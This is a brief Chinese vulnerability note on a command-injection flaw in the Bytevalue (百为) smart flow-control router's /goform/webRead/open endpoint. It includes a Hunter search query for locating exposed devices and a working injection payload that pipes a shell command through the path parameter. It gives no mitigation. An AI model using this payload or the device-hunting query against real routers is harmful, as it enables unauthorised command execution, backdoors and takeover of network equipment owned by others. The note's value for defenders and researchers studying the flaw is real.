百为智能流控路由器存在命令执行漏洞¶

一、漏洞简介¶

百为智能流控路由器/goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令，写入后门，获取服务器权限，从而获取路由器权限。

二、影响版本¶

• 百为智能流控路由器

三、资产测绘¶

• hunterapp.name=="BYTEVALUE 百为流控 Router"
• 特征

四、漏洞复现¶

/goform/webRead/open/?path=|ip addr

更新: 2024-02-29 23:57:13
原文: https://www.yuque.com/xiaokp7/ocvun2/ig5lw85h3w0ygdfh